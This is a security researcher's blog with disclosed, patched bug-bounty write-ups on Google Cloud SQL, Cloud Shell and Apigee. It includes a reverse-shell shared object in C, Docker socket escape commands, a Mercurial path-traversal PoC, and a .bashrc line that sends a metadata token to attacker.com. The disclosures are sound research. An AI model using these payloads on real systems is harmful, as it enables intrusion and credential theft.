Author: wtm@offensi.com

How to contact Google SRE: Dropping a shell in cloud SQL

Note: The vulnerabilities that are discussed in this post were patched quickly and properly by Google. We support responsible disclosure. The research that resulted in this post was done by me and my bughunting friend Ezequiel Pereira. You can read this same post on his website

About Cloud SQL

Google Cloud SQL is a fully managed relational database service. Customers can deploy a SQL, PostgreSQL or MySQL server which is secured, monitored and updated by Google. More demanding users can easily scale, replicate or configure high-availability. By doing so users can focus on working with the database, instead of dealing with all the previously mentioned complex tasks. Cloud SQL databases are accessible by using the applicable command line utilities or from any application hosted around the world. This write-up covers vulnerabilities that we have discovered in the MySQL versions 5.6 and 5.7 of Cloud SQL.

Limitations of a managed MySQL instance

Because Cloud SQL is a fully managed service, users don’t have access to certain features. In particular, the SUPER and FILE privilege. In MySQL, the SUPER privilege is reserved for system administration related tasks and the FILE privilege for reading/writing to and from files on the server running the MySQL daemon. Any attacker who can get a hold of these privileges can easily compromise the server. 

Furthermore, mysqld port 3306 is not reachable from the public internet by default due to firewalling. When a user connects to MySQL using the gcloud client (‘gcloud sql connect <instance>’), the user’s ip address is temporarily added to the whitelist of hosts that are allowed to connect. 

Users do get access to the ‘root’@’%’ account. In MySQL users are defined by a username AND hostname. In this case the user ‘root’ can connect from any host (‘%’). 

Elevating privileges

Bug 1. Obtaining FILE privileges through SQL injection

When looking at the web-interface of the MySQL instance in the Google Cloud console, we notice several features are presented to us. We can create a new database, new users and we can import and export databases from and to storage buckets. While looking at the export feature, we noticed we can enter a custom query when doing an export to a CSV file. 

Because we want to know how Cloud SQL is doing the CSV export, we intentionally enter the incorrect query “SELECT * FROM evil AND A TYPO HERE”. This query results in the following error: 

Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND A TYPO HERE INTO OUTFILE '/mysql/tmp/savedata-1589274544663130747.csv' CHARA' at line 1

The error clearly shows that the user that is connecting to MySQL to do the export has FILE privileges. It attempts to select data to temporarily store it into the ‘/mysql/tmp’ directory before exporting it to a storage bucket. When we run ‘SHOW VARIABLES’ from our MySQL client we notice that ‘/mysql/tmp’ is the secure_file_priv directory, meaning that ‘/mysql/tmp’ is the only path where a user with FILE privileges is allowed to store files. 

By adding the MySQL comment character (#) to the query we can perform SQL injection with FILE privileges: 

SELECT * FROM ourdatabase INTO ‘/mysql/tmp/evilfile’ #

An attacker could now craft a malicious database and select the contents of a table but can only write the output to a file under ‘/mysql/tmp’. This does not sound very promising so far. 

Bug 2. Parameter injection in mysqldump

When doing a regular export of a database we notice that the end result is a .sql file which is dumped by the ‘mysqldump’ tool. This can easily be confirmed when you open an exported database from a storage bucket, the first lines of the dump reveal the command and version: 

-- MySQL dump 10.13  Distrib 5.7.25, for Linux (x86_64)
--
-- Host: localhost    Database: mysql
-- ------------------------------------------------------
-- Server version	5.7.25-google-log<!-- wp:html -->
-- MySQL dump 10.13&nbsp; Distrib 5.7.25, for Linux (x86_64)
5.7.25-google-log</em></p>

Now we know that when we run the export tool, the Cloud SQL API somehow invokes mysqldump and stores the database before moving it to a storage bucket. 

When we intercept the API call that is responsible for the export with Burp we see that the database (‘mysql’ in this case) is passed as a parameter: 

An attempt to modify the database name in the API call from ‘mysql’ into ‘–help’ results into something that surprised us. The mysqldump help is dumped into a .sql file in a storage bucket. 

mysqldump  Ver 10.13 Distrib 5.7.25, for Linux (x86_64)
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

…

Dumping structure and contents of MySQL databases and tables.
Usage: mysqldump [OPTIONS] database [tables]
OR     mysqldump [OPTIONS] --databases [OPTIONS] DB1 [DB2 DB3...]
OR     mysqldump [OPTIONS] --all-databases [OPTIONS]

...
--print-defaults        Print the program argument list and exit.
--no-defaults           Don't read default options from any option file,
                        except for login file.
--defaults-file=#       Only read default options from the given file #.

Testing for command injection resulted into failure however. It seems like mysqldump is passed as the first argument to execve(), rendering a command injection attack impossible. 

We now can however pass arbitrary parameters to mysqldump as the ‘–help’ command illustrates. 

Crafting a malicious database

Among a lot of, in this case, useless parameters mysqldump has to offer, two of them appear to be standing out from the rest, namely the ‘–plugin-dir’ and the ‘–default-auth’ parameter. 

The –plugin-dir parameter allows us to pass the directory where client side plugins are stored. The –default-auth parameter specifies which authentication plugin we want to use. Remember that we could write to ‘/mysql/tmp’? What if we write a malicious plugin to ‘/mysql/tmp’ and load it with the aforementioned mysqldump parameters? We must however prepare the attack locally. We need a malicious database that we can import into Cloud SQL, before we can export any useful content into ‘/mysql/tmp’. We prepare this locally on a MySQL server running on our desktop computers. 

First we write a malicious shared object which spawns a reverse shell to a specified IP address. We overwrite the _init function:

#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/ip.h>

void _init() {
  FILE * fp;
  int fd; 
  int sock; 
  int port = 1234; 
 
  struct sockaddr_in addr;
  char * callback = "123.123.123.123";
  char mesg[]= "Shell on speckles>\n";
  char shell[] = "/bin/sh";
  
  addr.sin_family = AF_INET;
  addr.sin_port = htons(port);
  addr.sin_addr.s_addr = inet_addr(callback);
  fd = socket(AF_INET, SOCK_STREAM, 0);
  connect(fd, (struct sockaddr*)&addr, sizeof(addr));

  send(fd, mesg, sizeof(mesg), 0);

  dup2(fd, 0); 
  dup2(fd, 1); 
  dup2(fd, 2); 
  execl(shell, "sshd", 0, NULL);     
  close(fd);
}

We compile it into a shared object with the following command: 

gcc -fPIC -shared -o evil_plugin.so evil_plugin.c -nostartfiles

On our locally running database server, we now insert the evil_plugin.so file into a longblob table: 

mysql -h localhost -u root

>CREATE DATABASE files
>USE files
> CREATE TABLE `data` (
  `exe` longblob
) ENGINE=MyISAM DEFAULT CHARSET=binary;
> insert into data VALUES(LOAD_FILE('evil_plugin.so'));

Our malicious database is now done! We export it to a .sql file with mysqldump: 

Mysqldump -h localhost -u root files > files.sql 

Next we store files.sql in a storage bucket. After that, we create a database called ‘files’ in Cloud SQL and import the malicious database dump into it. 

Dropping a Shell

With everything prepared, all that’s left now is writing the evil_plugin.so to /mysql/tmp before triggering the reverse shell by injecting ’–plugin-dir=/mysql/tmp/ –default-auth=evil_plugin’ as parameters to mysqldump that runs server-side. 

To accomplish this we once again run the CSV export feature, this time against the ‘files’ database while passing the following data as it’s query argument: 

SELECT * FROM data INTO DUMPFILE '/mysql/tmp/evil_plugin.so' #

Now we run a regular export against the MySQL database again, and modify the request to the API with Burp to pass the correct parameters to mysqldump: 

Success! On our listening netcat we are now dropped into a reverse shell.

Fun fact

Not long after we started exploring the environment we landed our shell in we noticed a new file in the /mysql/tmp directory named ‘greetings.txt’: 

Google SRE (Site Reliability Engineering) appeared to be on to us 🙂 It appeared that during our attempts we crashed a few of our own instances which alarmed them. We got into touch with SRE via e-mail and informed them about our little adventure and they kindly replied back.

However our journey did not end here, since it appeared that we are trapped inside a Docker container, running nothing more than the bare minimum that’s needed to export our database. We needed to find a way to escape and we needed it quickly, SRE knows what we are doing and now Google might be working on a patch. 

Escaping to the host

The container that we had access to was running unprivileged, meaning that no easy escape was available. Upon inspecting the network configuration we noticed that we had access to eth0, which in this case had the internal IP address of the container attached to it. 

This was due to the fact that the container was configured with the Docker host networking driver (–network=host). When running a docker container without any special privileges it’s network stack is isolated from the host. When you run a container in host network mode that’s no longer the case. The container does no longer get its own IP address, but instead binds all services directly to the hosts IP. Furthermore we can intercept ALL network traffic that the host is sending and receiving on eth0  (tcpdump -i eth0). 

The Google Guest Agent (/usr/bin/google_guest_agent)

When you inspect network traffic on a regular Google Compute Engine instance you will see a lot of plain HTTP requests being directed to the metadata instance on 169.254.169.254. One service that makes such requests is the Google Guest Agent. It runs by default on any GCE instance that you configure. An example of the requests it makes can be found below.

The Google Guest Agent monitors the metadata for changes. One of the properties it looks for is the SSH public keys. When a new public SSH key is found in the metadata, the guest agent will write this public key to the user’s .authorized_key file, creating a new user if necessary and adding it to sudoers.

The way the Google Guest Agent monitors for changes is through a call to retrieve all metadata values recursively (GET /computeMetadata/v1/?recursive=true), indicating to the metadata server to only send a response when there is any change with respect to the last retrieved metadata values, identified by its Etag (wait_for_change=true&last_etag=<ETAG>).

This request also includes a timeout (timeout_sec=<TIME>), so if a change does not occur within the specified amount of time, the metadata server responds with the unchanged values.

Executing the attack

Taking into consideration the access to the host network, and the behavior of the Google Guest Agent, we decided that spoofing the Metadata server SSH keys response would be the easiest way to escape our container.

Since ARP spoofing does not work on Google Compute Engine networks, we used our own modified version of rshijack (diff) to send our spoofed response.

This modified version of rshijack allowed us to pass the ACK and SEQ numbers as command-line arguments, saving time and allowing us to spoof a response before the real Metadata response came.

We also wrote a small Shell script that would return a specially crafted payload that would trigger the Google Guest Agent to create the user “wouter”, with our own public key in its authorized_keys file.

This script receives the ETag as a parameter, since by keeping the same ETag, the Metadata server wouldn’t immediately tell the Google Guest Agent that the metadata values were different on the next response, instead waiting the specified amount of seconds in timeout_sec.

To achieve the spoofing, we watched requests to the Metadata server with tcpdump (tcpdump -S -i eth0 ‘host 169.254.169.254 and port 80’ &), waiting for a line that looked like this:

<TIME> IP <LOCAL_IP>.<PORT> > 169.254.169.254.80: Flags [P.], seq <NUM>:<TARGET_ACK>, ack <TARGET_SEQ>, win <NUM>, length <NUM>: HTTP: GET /computeMetadata/v1/?timeout_sec=<SECONDS>&last_etag=<ETAG>&alt=json&recursive=True&wait_for_change=True HTTP/1.1

As soon as we saw that value, we quickly ran rshijack, with our fake Metadata response payload, and ssh’ing into the host:

fakeData.sh <ETAG> | rshijack -q eth0 169.254.169.254:80 <LOCAL_IP>:<PORT> <TARGET_SEQ> <TARGET_ACK>; ssh -i id_rsa -o StrictHostKeyChecking=no wouter@localhost

Most of the time, we were able to type fast enough to get a successful SSH login :).

Once we accomplished that, we had full access to the host VM (Being able to execute commands as root through sudo).

Impact & Conclusions

Once we escaped to the host VM, we were able to fully research the Cloud SQL instance.

It wasn’t as exciting as we expected, since the host did not have much beyond the absolutely necessary stuff to properly execute MySQL and communicate with the Cloud SQL API.

One of our interesting findings was the iptables rules, since when you enable Private IP access (Which cannot be disabled afterwards), access to the MySQL port is not only added for the IP addresses of the specified VPC network, but instead added for the full 10.0.0.0/8 IP range, which includes other Cloud SQL instances.

Therefore, if a customer ever enabled Private IP access to their instance, they could be targeted by an attacker-controlled Cloud SQL instance. This could go wrong very quickly if the customer solely relied on the instance being isolated from the external world, and didn’t protect it with a proper password.

Furthermore,the Google VRP team expressed concern since it might be possible to escalate IAM privileges using the Cloud SQL service account attached to the underlying Compute Engine instance

4 Google Cloud Shell bugs explained – bug #1

Quick navigation



Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow‘s video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Bug #1 – The Python Language Server

Introduction

Google Cloud Shell provides users with a feature called “Open In Cloud Shell”. By using this feature, users can create a link that automatically opens Cloud Shell and clones a Git repository hosted on either Github or Bitbucket. This is done by passing the ‘cloudshell_git_repo’ parameter to the Cloud Shell URL, as can be seen in the code below:

<a href="https://ssh.cloud.google.com/cloudshell/editor?cloudshell_git_repo=http://path-to-repo/sample.git"><img alt="Open in Cloud Shell" src ="https://gstatic.com/cloudssh/images/open-btn.svg"></a>

Upon opening the link, Cloud Shell is launched and the ‘http://path-to-repo/sample.git&#8217; repo is cloned inside the users home directory.

Multiple parameters can be passed, other than the ‘cloud_git_repo’ GET-parameter. When combining the ‘cloud_git_repo’ with the ‘open_in_editor’ parameter we can clone a repository and launch the Theia IDE on a file specified all at once. A full overview of all supported GET-parameters can be found in the Cloud Shell documentation.

PYLS

When a user clones a Git repository containing ‘some_python_file.py’ and passes this file to the open_in_editor GET-parameter (‘open_in_editor=some_python_file.py’) the Theia editor starts editing the specified file. In the editor we can clearly see that all of a sudden the IDE received syntax highlighting and autocompletion capabilities:

When inspecting the processes running with ‘ps’ we notice a new process. The editor_exec.sh script fired up the pyls python language server.

wtm          736  0.0  0.1  11212  2920 ?        S<s  13:54   0:00 /bin/bash /google/devshell/editor/editor_exec.sh python -m pyls

The parent process appears to be sshd. If we attach strace to the sshd process and watch the Python language server being fired up, we can inspect all the system calls being executed. We save the output to ‘/tmp/out’ for later inspection.

While going through all the syscalls in ‘/tmp/out’ i noticed the Python language server is trying to query non-existent packages in my home directory with the stat() syscall.

538   stat("/home/wtm/supervisor", 0x7ffdf08e11e0) = -1 ENOENT (No such file or directory)
542   stat("/home/wtm/pyls", 0x7ffcbbf61a10) = -1 ENOENT (No such file or directory)
542   stat("/home/wtm/google", 0x7ffcbbf5fe00) = -1 ENOENT (No such file or directory)

When Python < 3.3 tries to import a package, it looks for a ‘__init__.py’ file which is executed. (See PEP 382 for more information). We now have our attack vector!

Constructing the exploit

If we create an evil Python git repository named ‘supervisor’, ‘pyls’ or ‘google’ containing a malicious ‘__init__.py’ we can trick the Python language server into executing arbitrary code. All we have to do is store the evil repository on Github and point our victim to https://ssh.cloud.google.com/console/editor?cloudshell_git_repo=https://github.com/offensi/supervisor&open_in_editor=__init__.py. By passing ‘__init__.py’ to the ‘open_in_editor’ GET-parameter, we force the IDE into automatically launching the Python Language Server.

That same language server now starts looking for a package named ‘supervisor’ which ofcourse now can be found since we have just cloned the repository with the same name. The malicious code hidden inside ‘__init__.py’ is then executed, meaning our victims GCP resources are compromised.

Continue reading: Bug #2 – A custom Cloud Shell image

4 Google Cloud Shell bugs explained – bug #2

Quick navigation



Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow‘s video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Bug #2 – A custom Cloud Shell image

Introduction

The Cloud Shell presented to you by default is based on a Debian 9 Stretch Docker image. This image contains the most popular tools and is stored in Google’s Cloud Repository at http://gcr.io/cloudshell-images/cloudshell:latest.

If a user has special needs it can replace the Debian Cloud Shell image and launch a custom image. For example, if you wish to use a Terraform image for infrastructure provision, you can replace the Debian image with the Terraform image under the Cloud Shell Environment settings.

Another way to automatically boot a custom Docker image is by providing the ‘cloudshell_image’ GET-parameter, as such: https://ssh.cloud.google.com/cloudshell/editor?cloudshell_image=gcr.io/google/ruby

The trusted environment

Google makes a distinction between the default image and custom images. A container running the default image comes with your home folder mounted to /home/username. Furthermore upon boot it provisions your gcloud client with credentials.

When launching a custom image from an untrusted third party this might introduce a security risk. What if a custom image contains malicious code and tries to access your GCP resources?

Google therefore introduced ‘trusted’ and ‘untrusted’ mode. The only image that is automatically runs in trusted mode is ‘gcr.io/cloudshell-images/cloudshell:latest’. When booting a custom image in untrusted mode, the container is provisioned with a scratch home directory mounted to /home/user that is empty and deleted on end. Furthermore there are no credentials attached to the gcloud client and you can not query the metadata instance on metadata.google.internal to obtain a bearer token.

Escaping the untrusted environment

We have already learned how we can escape to the host from the default Cloud Shell in the general introduction of this series of posts. We again paste the following lines of code.

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name LiveOverflow-container -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start LiveOverflow-container
sudo docker -H unix:///google/host/var/run/docker.sock exec -it LiveOverflow-container /bin/sh

At this point we have a shell on the host. We change the root by chrooting into /rootfs with ‘chroot /rootfs’. After searching the filesystem it became apparent that the host instance was in a different state then expected. While the container hosting the custom Docker image had a empty /home/user folder attached to it, the ‘dmesg’ and ‘mount’ command clearly show that the persistent disk containing the home folder of the user is still attached to the underlying instance!

Exploiting it

With the above knowledge any attacker can now build a malicious Docker image. This malicious Docker image can use the same technique as displayed above to escape to the host istance when booted. After escaping to the host the malicious image can steal contents from the user’s home folder.

Furthermore an attack can write arbitrary contents to the user’s home folder in an attempt to steal credentials, for example by adding the following code to ‘/var/google/devshell-home/.bashrc’

curl -H"Metadata-flavor: Google" http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token > /tmp/token.json
curl -X POST -d@/tmp/token.json https://attacker.com/api/tokenupload

Continue reading: Bug #3 – Git clone

4 Google Cloud Shell bugs explained – bug #3

Quick navigation



Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow‘s video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Bug #3 – Git clone

Introduction

In #Bug 1 of this series of articles we discussed the possibility of appending the ‘cloudshell_git_repo’ GET-repo to the Cloud Shell URL in order to clone a Github or Bitbucket repository. Aside from this parameter we can also specify a ‘cloudshell_git_branch’ and ‘cloudshell_working_dir’ parameter to aid in the cloning process.

How does this work? When we pass these 3 parameters listed above to the Cloud Shell URL, the cloudshell_open bash function is called inside your terminal window. This function is defined in ‘/google/devshell/bashrc.google.d/cloudshell_open.sh’. I have listed the functionality of the most important lines of code below.

function cloudshell_open {
... 
git clone -- "$cloudshell_git_repo" "$target_directory"
cd "$cloudshell_working_dir"
git checkout "$cloudshell_git_branch"
...
}

We see that ‘git clone’ is executed against our URL specified in the cloudshell_git_repo GET-parameter. Then the script changes the working directory by cd-ing into any directory specified in cloudshell_working_dir. Then it calls ‘git checkout’ on the specified git branch. Considering the fact that all input parameters are properly filtered, this might seem harmless at first

Git-hooks

Git-hooks are custom scripts that are fired when an important action is executed. The git-hooks that are created by default when you run ‘git init’ are stored in .git/hooks and might look something similar to this.

Wouldn’t it be cool if we can store these custom scripts inside a evil repository and have them executed when a victim’s Cloud Shell execute ‘git checkout’? According to the Git manual that’s not possible. These hooks are client-side hooks. Anything that is hidden inside .git/ is ignored and thus not copied to the remote repo.

Bare repositories

The standard way of creating a repository is with ‘git init’. This creates a working repository with the well know layout. It contains a .git/ directory where all revision history and metadata is stored and it contains the checked out version of the files you are working on.

There is another format in which a repository can be stored however. It is called a bare repository. This type of repository is normally used for sharing and has a sort of flat layout. It can be created by running the ‘git init –bare’ command.

The exploit

In the screenshot you can clearly see that we have just created a git repo without the ‘.git’ directory but WITH a ‘hooks’ directory! This means we can push the hooks stored in this bare repository to a remote repo, if we hide them in a ‘normal’ repositories subdirectory. Remember the ‘cd’ command in the cloudshell_function? We can jump into any subdirectory we want and execute ‘git checkout’, after which hooks that are present get fired.

I published a proof of concept for this bug for you to look at in https://github.com/offensi/git-poc. Running a git clone and a checkout on this repository as specified in the README will execute a harmless post-checkout hook.

A evil URL to target a Cloud Shell victim would look like this: https://ssh.cloud.google.com/console/editor?cloudshell_git_repo=https://github.com/offensi/git-poc&cloudshell_git_branch=master&cloudshell_working_dir=evilgitdirectory. Successful exploitation can be seen in the screenshot below.

Continue reading: Bug #4 – Go get pwned

4 Google Cloud Shell bugs explained – bug #4

Quick navigation



Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow‘s video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Bug #4 – Go and get pwned

Introduction

While auditing the Javascript code, that’s responsible for all the client-side work in your browser when working with Cloud Shell, i noticed something out of the ordinary.

The code that is handling all GET-parameters, listed a parameter that is not present in the official documentation.

   var B3b = {
        CREATE_CUSTOM_IMAGE: "cloudshell_create_custom_image",
        DIR: "cloudshell_working_dir",
        GIT_BRANCH: "cloudshell_git_branch",
        GIT_REPO: "cloudshell_git_repo",
        GO_GET_REPO: "cloudshell_go_get_repo",
        IMAGE: "cloudshell_image",
        OPEN_IN_EDITOR: "cloudshell_open_in_editor",
        PRINT: "cloudshell_print",
        TUTORIAL: "cloudshell_tutorial"
    };

All parameters listed above are listed and explained in the documentation, except for the ‘cloudshell_go_get_repo’ GET-parameter. When constructing a Cloud Shell URL with this parameter (https://ssh.cloud.google.com/cloudshell/editor?cloudshell_go_get_repo=https://github.com/some/package), again, the cloudshell_open function is invoked.

The code responsible for handling the ‘go get’ command can be seen below.

function cloudshell_open {
...
valid_url_chars="[a-zA-Z0-9/\._:\-]*"
...
 if [[ -n "$cloudshell_go_get_repo" ]]; then
    valid_go_get=$(echo $cloudshell_go_get_repo | grep -e "^$valid_url_chars$")
    if [[ -z "$valid_go_get" ]]; then
      echo "Invalid go_get"
      return
    fi
...
go get -- "$cloudshell_go_get_repo"
go_src="$(go env GOPATH | cut -d ':' -f 1)/src/$go_get"

All input seemed to be filtered properly. Nevertheless i kept some notes about this finding.

Container Vulnerability scanning

A few months later i was hunting for bugs in Google’s Container Registry (gcr.io). One of the features it provides is called Vulnerability Scanning. When you enable Vulnerability Scanning, every Docker image you push to the registry is scanned for known vulnerabilities and exposures. As new vulnerabilities are discovered, the Container Registry checks if they affect images that are in your registry.

One of the Docker images i had been working on before was, ofcourse, the Cloud Shell image that’s available on https://gcr.io/cloudshell-images/cloudshell:latest. I had this image readily available on my local Docker engine so i pushed it to the registry in order to inspect the workings of the Vulnerability Scanning feature.

Upon opening the results of the scan against the Cloud Shell image i was a bit surprised. The Cloud Shell image seemed to be packed with over 500 vulnerabilities.

After checking almost every vulnerability that was listed, i finally found one that looked interesting and useful to me: CVE-2019-3902.

Exploiting CVE-2019-3902

CVE-2019-3902 describes a vulnerability in Mercurial. Due to a vulnerability in the path-checking logic of the Mercurial/HG client, a malicious repository can write files outside of the repository boundaries on the clients filesystem. I knew that the ‘go get’ command is capable of handling several types of repositories: svn, bzr, git and HG!

Since there is no public exploit for CVE-2019-3902 available i had to try to reconstruct it. I downloaded 2 versions of the Mercurial source code: the patched version and the unpatched version. Hopefully comparing the 2 could provide me with some clues of how to exploit it.

When examining the patched Mercurial source code, i stumbled across automated test cases that were stored in the /tests/ directory. Based on these tests i was able to reconstruct the exploit.

#!/bin/sh
# PoC for Google VRP by wtm@offensi.com
mkdir hgrepo
hg init hgrepo/root
cd hgrepo/root
ln -s ../../../bin
hg ci -qAm 'add symlink "bin"'
hg init ../../../bin
echo 'bin = bin' >> .hgsub
hg ci -qAm 'add subrepo "bin"'

cd ../../../bin
echo '#!/bin/sh' >> cut
echo 'wall You have been pwned!' >> cut
chmod +x cut
hg add cut
hg commit -m "evil cut bin"

cd /var/www/html/hgrepo/root
hg commit -m "final"

The code above constructs a malicious repository. When this repository is being cloned by a vulnerable hg client, a malicious file named ‘cut’ is written to ../../../bin. When we looked at the cloudshell_open function before we saw that the ‘cut’ command is being called right after ‘go get’ clones our malicious repository and thus our arbitrary code is executed.

The malicious repo was stored on a personal webserver under go.offensi.com/hgrepo. A malicious go.html file was placed in the root of the webserver to instruct the ‘go get’ command to clone a Mercurial repository.

<meta name="go-import" content="go.offensi.com/go.html hg https://go.offensi.com/hgrepo/root">

Now any Cloud Shell user can be tricked into arbitrary code execution by opening this link: https://ssh.cloud.google.com/cloudshell/editor?cloudshell_go_get_repo=https://go.offensi.com/go.html

4 Google Cloud Shell bugs explained

Quick navigation

  • Introduction (this page)
  • Bug #1 – The Python language server
  • Bug #2 – A custom Cloud Shell image
  • Bug #3 – Git clone
  • Bug #4 – Go and get pwned



Note: The vulnerabilities that are discussed in this series of posts and in LiveOverflow‘s video were patched quickly and properly by Google (a long time ago). We support responsible disclosure.

Introduction

In 2019 i spent a significant amount of my time hunting for bugs in the Google Cloud Platform. While the Google Cloud Platform is known to be a tough target among bughunters, i was lucky enough to have some modest success in finding bugs in one of it’s services, the Google Cloud Shell.

In July i was therefore approached by Eduardo of the Google VRP. He asked me if i was willing to demonstrate a Cloud Shell bug to LiveOverflow as part of an interview for a video, on one precondition though: the bug had to be unfixed by Google! LiveOverflow did a great job in polishing up my bug, the result of which can be seen here.

Later on Google invited me to attend the BugSWAT event in October at Google’s HQ in London. At this event i was able to share some of my findings to my fellow bughunters and Googlers by giving a talk titled “4 Cloudshell bugs in 25 minutes”.

In total i discovered 9 vulnerabilities in the Google Cloud Shell. In this series of posts i will uncover and explain 4 of them, ending with my most favorite one.

About Google Cloud Shell

Google Cloud Shell provides administrators and developers with a quick way to access cloud resources. It provides users with a Linux shell that is accessible via your browser. This shell comes with pre-installed tools needed to start working on your Google Cloud Platform project, such as gcloud, Docker, Python, vim, Emacs and Theia, a Powerful opensource IDE .

Users of the Google Cloud Platform can launch a Cloud Shell instance via the Cloud Console or simply by visiting this url: https://console.cloud.google.com/home/dashboard?cloudshell=true&project=your_project_id

When the Cloud Shell instance is done starting a terminal window is presented to the user. In the screenshot below you can see what that looks like. Noteworthy is the fact that the gcloud client is already authenticated. If an attacker is able to compromise your Cloud Shell, it can access all your GCP resources.

Escaping the Cloud Shell container

When inspecting the running processes with ‘ps’ inside the Cloud Shell it looks like that we might be trapped inside a Docker container. There is only a small number of processes running.

To confirm our suspicion we can inspect the /proc filesystem. Docker Engine for Linux makes use of so called control groups (cgroups).  A cgroup limits an application to a specific set of resources. For example, by using cgroups Docker can limit the amount of memory that is allocated to a container. In the case of Cloud Shell, i identified the use of Kubernetes and Docker by inspecting the contents of /proc/1/environ, as can be seen in the screenshot below.

At this point i knew for sure i was trapped inside a container. If i wanted to learn more about the inner workings of Cloud Shell i needed to find a way to escape to the host. Luckily, after exploring the filesystem i noticed that there were 2 Docker unix sockets available. One in ‘/run/docker.sock‘, which is the default path for our Docker client running inside the Cloud Shell (Docker inside Docker), the second one in ‘/google/host/var/run/docker.sock‘.

The pathname of the second Unix socket reveals that this is the host based Docker socket. Anyone who can communicate with a host based Docker socket can easily escape the container and gain root access on the host at the same time.

Using the script below i escaped to the host.

# create a privileged container with host root filesystem mounted - wtm@offensi.com
sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name LiveOverflow-container -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start LiveOverflow-container
sudo docker -H unix:///google/host/var/run/docker.sock exec -it LiveOverflow-container /bin/sh

The bigger picture

Now that i had root access on the host, i started exploring the configuration of Kubernetes, which is stored under ‘/etc/kubernetes/manifests/‘ in YAML files. Based on the Kubernetes configuration and several hours of inspecting traffic with tcpdump i now had a better overview of how the Cloud Shell works. I created a quick and dirty high-level diagram to keep a better overview.

Reconfigure Kubernetes

Most of the containers inside the Kubernetes pods are running unprivileged by default. Because of this we are unable to use debugging tools like gdb and strace inside these containers. Gdb and strace rely on the ptrace() syscall and require a minimum capability of SYS_PTRACE. It’s easier to run all containers in privileged mode, instead of granting them the SYS_PTRACE capability. Therefore i wrote a script to reconfigure the ‘cs-6000’ pod.

The script below writes a new cs-6000.yaml config and links the old config to /dev/null. After running it you will find that all containers inside the pod will automatically reboot. Now all containers run in privileged mode and we can start debugging.

#!/bin/sh
# wtm@offensi.com

# write new manifest
cat /etc/kubernetes/manifests/cs-6000.yaml | sed s/"    'securityContext': \!\!null 'null'"/\
"    'securityContext':\n"\
"      'privileged': \!\!bool 'true'\n"\
"      'procMount': \!\!null 'null'\n"\
"      'runAsGroup': \!\!null 'null'\n"\
"      'runAsUser': \!\!null 'null'\n"\
"      'seLinuxOptions': \!\!null 'null'\n"/g > /tmp/cs-6000.yaml

# replace old manifest with symlink
mv /tmp/cs-6000.yaml /etc/kubernetes/manifests/cs-6000.modified
ln -fs /dev/null /etc/kubernetes/manifests/cs-6000.yaml

Additional resources

Continue reading: Bug #1 – The Python language server

LFI in Apigee portals

Introduction

Apigee provides clients with an API management platform that enables them to design, secure, deploy, monitor, and scale API’s. Furthermore Apigee provides clients with a customizable developer portal to enable developers to consume API’s easily and securely, and to measure API performance and usage. Apigee was acquired by Google in 2016 and therefore it is considered in scope for the Google VRP, meaning that any valid vulnerability found in the Apigee platform will be rewarded.

Creating a custom portal

In order to interact with the development community, API providers can expose their API to the public by building a custom portal. Apigee portals are based on Drupal 7 and come with a preloaded set of options for users to customize. Users can modify the default theme, add pages and users, manage assets and publish API’s, as can be seen in the screenshot taken from the Portal management interface.

manage-portals

When done editing, the portal manager publishes the portal on a subdomain of apigee.io. Healthapix.apigee.io shows a clear example of what the end result of a portal looks like.

Customizing the stylesheet

According to the documentation on https://docs-new.apigee.com, users can edit the style of the theme by using SCSS instead of CSS:

The style rules are defined using Sassy Cascading Style Sheet (SCSS). SCSS is a superset of Cascading Style Sheets (CSS), offering the following advantages:

  • Global variables that can be re-used throughout the style sheet.
  • Nested rules to save style sheet development time.
  • Ability to create mixins and functions

This implicates that on the server side compilation and conversion is taking place. After compilation completes regular CSS files are published to the portal. This process looks like something that might be worth taking a closer look at.

The import directive

When going through the language specific documentation on sass-lang.com, there is one directive that stands out from the rest:

CSS has an import option that lets you split your CSS into smaller, more maintainable portions. The only drawback is that each time you use @import in CSS it creates another HTTP request. Sass builds on top of the current CSS @import but instead of requiring an HTTP request, Sass will take the file that you want to import and combine it with the file you’re importing into so you can serve a single CSS file to the web browser.

In short, the import directive allows us to reference other SCSS files by using this syntax: @import ‘somefile’. When seeing this directive, the SASS compiler will automatically try to locate ‘somefile.scss’, ‘somefile.sass’, or ‘somefile’. Depending on the version of the compiler you are using you might see some small differences in behavior.

Exploitation

What happens if we reference an arbitrary file with @import ‘/etc/shadow’? This file does not contain valid SCSS code, so compilation will most likely fail.

schermafbeelding2019-01-31om2.19.02pm

As can be seen in the image above compilation fails indeed, throwing an error which exposes the contents of /etc/shadow, which is only readable by user root.

This particular bug was fixed within a matter of hours after submitting the details to Google. Thanks to Google for running the VRP the way they do!

[twitter-follow screen_name=’wtm_offensi’]

Copyright © 2024 Offensi

Copyright OffensiUp ↑